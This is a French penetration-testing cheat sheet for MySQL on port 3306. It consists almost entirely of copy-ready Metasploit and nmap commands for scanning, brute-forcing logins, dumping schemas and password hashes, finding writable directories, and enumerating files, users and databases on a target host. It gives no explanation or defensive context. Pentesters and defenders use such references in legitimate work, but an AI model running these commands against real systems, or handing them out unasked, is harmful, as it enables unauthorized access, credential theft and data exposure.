🔡MySQL - port 3306
Scan
$ nmap -sV -p3306 <target IP>
Connexion
$ mysql -h <host IP> -u <username> -p
Bruteforce
Avec metasploit:
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit
Avec nmap:
nmap -p3306 --script=mysql-brute --script-args userdb=/root/Desktop/user.txt, passdb=/root/Desktop/pass.txt <target IP>
Dump schema
msf6 > use auxiliary/scanner/mysql/mysql_schemadump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > exploit
Dump hash
Avec metasploit:
msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit
Avec nmap:
nmap -p3306 <target IP> --script=mysql-dump-hashes --script-args mysqluser=<username>,mysqlpass=<password>
Répertoires modifiables
msf6 > use auxiliary/scanner/mysql/mysql_writable_dirs
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set dir_list dir.txt
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > exploit
Enumeration des fichiers
msf6 > use auxiliary/scanner/mysql/mysql_file_enum
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set file_list files.txt
msf6 auxiliary(scanner/mysql/mysql_file_enum) > exploit
Enumeration des utilisateurs
nmap -p3306 <target IP> --script=mysql-users --script-args mysqluser=<username>,mysqlpass=<password>
Enumeration des bases de données
nmap -p3306 <target IP> --script=mysql-databases --script-args mysqluser=<username>,mysqlpass=<password>
Dernière mise à jour
Cet article vous a-t-il été utile ?